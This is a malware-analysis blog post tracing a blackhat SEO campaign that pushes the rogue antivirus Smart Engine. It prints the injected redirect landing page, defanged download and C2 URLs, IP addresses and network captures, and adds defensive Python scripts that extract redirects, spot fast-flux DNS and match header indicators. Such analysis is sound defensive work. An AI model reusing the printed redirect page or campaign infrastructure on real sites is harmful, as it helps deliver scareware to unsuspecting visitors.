BlackHat SEO Campaign used to spread Smart Engine

A new blackhat SEO campaign is distributing the setup installer of a new rogue security software product named Smart Engine. The campaign looks aggressive: we have logged more than 2000 infected websites that are being used to capture popular search keywords and redirect visitors to malicious URLs or fake scanner pages, with the intent of getting the rogue installer onto the victim's machine.

When a user clicks an infected URL, the landing page redirects in three ways at once (a meta refresh, a JavaScript location assignment and a fallback link), so the redirect works whether or not scripting is enabled:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>
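When triaging hundreds of compromised pages it helps to pull the redirect targets out automatically and spot the instant-redirect pattern above. The script below is an added example written for this post, not code from the campaign or from the original analysis; it runs on the defanged landing page quoted above (embedded as a constructed sample) and extracts the meta refresh, the script redirect and the anchor fallback, then normalises the host name by stripping the defanging space.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the defanged landing page quoted above, kept exactly as the
# post prints it (hxxp scheme and the space before ".co.cc").
SAMPLE_PAGE = """<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>
"""

# Script-driven navigation: [self|window|top|document].location[.href] = "..."
# or location.replace("..."). A plain "==" comparison does not match.
JS_REDIRECT = re.compile(
    r"""(?:self|window|top|document)?\.?location(?:\.href)?\s*(?:=|\.replace\s*\()\s*["']([^"']+)["']""",
    re.IGNORECASE,
)
META_REFRESH = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*(.+)", re.IGNORECASE)


class RedirectParser(HTMLParser):
    """Collects every way the page can send the browser somewhere else."""

    def __init__(self):
        super().__init__()
        self.meta_refresh = []      # (delay in seconds, url)
        self.links = []             # anchor hrefs (the "Please Click Here" fallback)
        self.script_targets = []    # urls assigned to location inside <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH.match(a.get("content") or "")
            if m:
                self.meta_refresh.append((int(m.group(1)), m.group(2).strip().strip("'\"")))
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands the whole <script> body to handle_data in one piece
        if self._in_script:
            self.script_targets.extend(JS_REDIRECT.findall(data))


def extract_redirects(html):
    """Map each target URL to the set of mechanisms that point at it."""
    p = RedirectParser()
    p.feed(html)
    p.close()
    targets = {}
    for delay, url in p.meta_refresh:
        targets.setdefault(url, set()).add(f"meta-refresh({delay}s)")
    for url in p.script_targets:
        targets.setdefault(url, set()).add("javascript")
    for url in p.links:
        targets.setdefault(url, set()).add("anchor")
    return targets


def has_instant_redirect(html):
    """True when an instant meta refresh and a script redirect agree on one
    target: the belt-and-braces pattern of the landing page above."""
    return any({"meta-refresh(0s)", "javascript"} <= kinds
               for kinds in extract_redirects(html).values())


def redirect_hosts(html):
    """Host names the page redirects to, with defanging spaces removed."""
    hosts = set()
    for url in extract_redirects(html):
        m = re.match(r"h[tx]{2}ps?://([^/?#]+)", url, re.IGNORECASE)
        if m:
            hosts.add(re.sub(r"\s+", "", m.group(1)))
    return sorted(hosts)
```

Feeding a real page to extract_redirects gives one entry per target with the mechanisms behind it; pages where all three mechanisms agree on a single external host are the ones to queue for the rest of the chain.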

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After a short time the download of an executable is prompted:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – -

The downloaded file is the installer of the Smart Engine rogue security software. Note the non-standard response headers ("Content-Type: application/octetstream" without the hyphen, and "Pragma: hack"): they appear again on the update download below and make a convenient network signature.

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

The Smart Engine main executable tries to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – -
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – -

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – -

The subdomain used for the activation page resolved to two different IPs within one second during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic (the update host serves a small .ini file, 1307 bytes, with the same odd headers seen on the installer download):

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com

Response headers:

Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary

GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

This subdomain also resolved to different IPs within a couple of seconds:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100
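Two lookups a second apart returning different addresses is the kind of thing worth pulling out of a resolver log automatically, together with the reverse view (which hosts share an address). The script below is an added example for this post, not code from the original analysis; it reads lines in the "date time # host # ip" format used above. The first four sample lines are the resolutions printed in this post with the defanging spaces removed; the timestamps on the last three lines are made up for the example, while their host/IP pairs come from the post. Dates are assumed to be day/month/year.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample in the post's own "date time # host # ip" format. The first
# four lines are the resolutions printed above (defanging spaces removed); the
# timestamps on the last three lines are made up, the host/IP pairs are from the
# post. Dates are read as day/month/year.
SAMPLE_LOG = """09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1.com # 69.57.173.219
09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1.com # 209.212.149.23
09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671.com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671.com # 209.222.8.100
09/10/2010 14.33.10 # update1.wlentor-traden-quzonk-1.com # 173.244.223.32
09/10/2010 14.35.10 # update1.wlentor-traden-quzonk-1.com # 173.244.223.32
09/10/2010 14.36.00 # secure.onlinesystempayment.com # 209.212.149.23
"""


def parse_resolutions(text):
    """Return (timestamp, host, ip) tuples from the log, skipping blank lines."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, ip = (part.strip() for part in line.split("#"))
        rows.append((datetime.strptime(ts, "%d/%m/%Y %H.%M.%S"), host, ip))
    return rows


def flux_hosts(text, window_seconds=300):
    """Hosts whose answer changed between two lookups less than window_seconds
    apart: {host: (sorted distinct ips, shortest gap in seconds between changes)}."""
    by_host = defaultdict(list)
    for ts, host, ip in parse_resolutions(text):
        by_host[host].append((ts, ip))
    result = {}
    for host, obs in by_host.items():
        obs.sort()
        # seconds between consecutive observations whose answers differ
        gaps = [(t2 - t1).total_seconds()
                for (t1, ip1), (t2, ip2) in zip(obs, obs[1:]) if ip1 != ip2]
        if gaps and min(gaps) <= window_seconds:
            result[host] = (sorted({ip for _, ip in obs}), min(gaps))
    return result


def shared_ips(text):
    """IPs answered for more than one host: the pivot that ties the activation
    domain and the payment domain to the same server."""
    hosts_for = defaultdict(set)
    for _, host, ip in parse_resolutions(text):
        hosts_for[ip].add(host)
    return {ip: sorted(hs) for ip, hs in hosts_for.items() if len(hs) > 1}
```

On the sample, flux_hosts flags the secure1 and report1 names (one and two seconds between differing answers) and leaves the stable update1 name alone, and shared_ips ties secure1.wlentor-traden-quzonk-1.com and secure.onlinesystempayment.com together through 209.212.149.23.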

DNS Queries:

A raw DNS packet for cilt442vyabkqqv.com was also captured; the only readable part of the answer is a TXT record carrying an SPF policy:

v=spf1 a mx ip4:209.222.8.100/22 ?all

The 209.222.8.0/22 range it authorizes covers the 209.222.8.x addresses of the report1 hosts above.

The malware queried an external site to learn the victim's public IP:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After a while we noticed a loop of connections:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It appears to connect to a Google IP (74.125.45.100) as a connectivity check, to see whether the victim is online. The custom User-Agent Sm17a_2211 is worth a signature of its own: the 2211 suffix also appears in the installer filename (packupdate107_2211.exe) and in the payment URL (ext3=2211) below.
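The captures on this page give a handful of header-level indicators that are cheap to match in proxy logs: the "Pragma: hack" header, the misspelled "application/octetstream" content type, the Sm17a_ User-Agent and the HEAD / probe sent straight to an IP address. The script below is an added example written for this post, not code from the original analysis or from any product; it splits a blank-line-separated capture into messages and reports which indicators each one matches. The sample log is constructed from the headers printed in this post plus two benign messages (www.example.com and a correctly spelled octet-stream response) that must not fire.

```python
import re
from ipaddress import ip_address

# Constructed sample: header lines from the captures in this post, one message
# per blank-line-separated block as a proxy log would hold them, plus two benign
# messages (www.example.com, a correctly spelled octet-stream) that must not fire.
SAMPLE_LOG = """HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910.net

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.example.com

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 10
"""


def parse_messages(text):
    """Split a log into messages: start line plus a lower-cased header dict."""
    msgs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        headers = {}
        for line in lines[1:]:
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip().lower()] = v.strip()
        msgs.append({"start": lines[0], "headers": headers})
    return msgs


def _is_bare_ip(host):
    """True when the Host header is an IPv4 literal (optionally with :port)."""
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def indicators(msg):
    """Names of the indicators from this campaign that a message matches."""
    h = msg["headers"]
    hits = []
    if h.get("pragma", "").lower() == "hack":
        hits.append("pragma-hack")
    # the real MIME type is application/octet-stream; this server drops the hyphen
    if h.get("content-type", "").lower().startswith("application/octetstream"):
        hits.append("malformed-octetstream")
    if h.get("user-agent", "").startswith("Sm17a_"):
        hits.append("ua-sm17a")
    # the connectivity loop: HEAD / sent straight to an IP, no hostname
    if msg["start"].startswith("HEAD / ") and _is_bare_ip(h.get("host", "")):
        hits.append("head-probe-to-ip")
    cd = h.get("content-disposition", "").lower()
    if "attachment" in cd and re.search(r"filename=.*\.exe\b", cd):
        hits.append("exe-attachment")
    return hits


def scan(text):
    """(start line, matched indicators) for every message that matched at least one."""
    out = []
    for m in parse_messages(text):
        hits = indicators(m)
        if hits:
            out.append((m["start"], hits))
    return out
```

The exe-attachment indicator is weak on its own (plenty of legitimate downloads look like that) and is only meaningful combined with the others, which is why scan reports the full list per message rather than a single verdict.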

A new domain is used for payments; note that it is HTTPS, and that the query string carries what looks like a fingerprint of the victim (wvXP and b_IE6, apparently Windows XP with IE6) together with the 2211 and 671 identifiers seen elsewhere in the traffic:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware also triggered a request to a legitimate site related to SSL certificates. The User-Agent shows it is Windows CryptoAPI fetching the issuing CA certificate, presumably to build the chain for the HTTPS payment connection above, so this request by itself is not malicious:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and now has the +S (System) attribute set:

Hosts File System Attribute

Hosts file content:

Hosts File Content
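A modified hosts file is both an indicator and a persistence mechanism, so a quick check of its entries and attributes belongs in the cleanup. The script below is an added example for this post, not code from the original analysis. It flags every hosts entry that is not the usual loopback-to-localhost mapping, distinguishing names blackholed to a loopback address from names hijacked to an outside address, and on Windows reports the +S attribute observed above. The sample hosts content is constructed (the real content is only shown in the screenshot), the example-av-vendor names are placeholders, and 192.0.2.10 is a documentation address, not one from this campaign; the default Windows path is assumed.

```python
import os
import stat
import sys
from ipaddress import ip_address

# Constructed sample hosts file. The post shows the real content only as a
# screenshot, so the two "example-av-vendor" lines are illustrative: one name
# blackholed to loopback, one pointed at an outside address (192.0.2.10 is a
# documentation range, not an address from this campaign).
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.example-av-vendor.com   # blackholed
192.0.2.10      update.example-av-vendor.com
"""


def parse_hosts(text):
    """(line number, address, [names]) for every non-comment line."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        entries.append((n, parts[0], parts[1:]))
    return entries


def suspicious_entries(text):
    """Everything except 'loopback -> localhost'. A name sent to a loopback
    address is being blackholed; a name sent anywhere else is being hijacked
    to a server of the attacker's choosing."""
    out = []
    for n, addr, names in parse_hosts(text):
        try:
            loopback = ip_address(addr).is_loopback
        except ValueError:
            out.append((n, addr, names, "unparseable address"))
            continue
        for name in names:
            if name.lower() in ("localhost", "localhost.localdomain"):
                continue
            out.append((n, addr, [name], "blackholed" if loopback else "hijacked"))
    return out


def has_system_attribute(path):
    """Windows only: True if the +S attribute the post observed is set on path.
    Returns None on other platforms, where the attribute does not exist."""
    if not sys.platform.startswith("win"):
        return None
    return bool(os.stat(path).st_file_attributes & stat.FILE_ATTRIBUTE_SYSTEM)


def check_live_hosts_file():
    """Run against the real file: the default Windows path (assumed) or /etc/hosts."""
    path = (os.path.join(os.environ.get("SystemRoot", r"C:\Windows"),
                         "System32", "drivers", "etc", "hosts")
            if sys.platform.startswith("win") else "/etc/hosts")
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    return has_system_attribute(path), suspicious_entries(text)
```

Remember that the +S attribute has to be cleared before the file can be restored from an ordinary editor, and that a clean hosts file on a machine that still runs the rogue executable will simply be rewritten.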
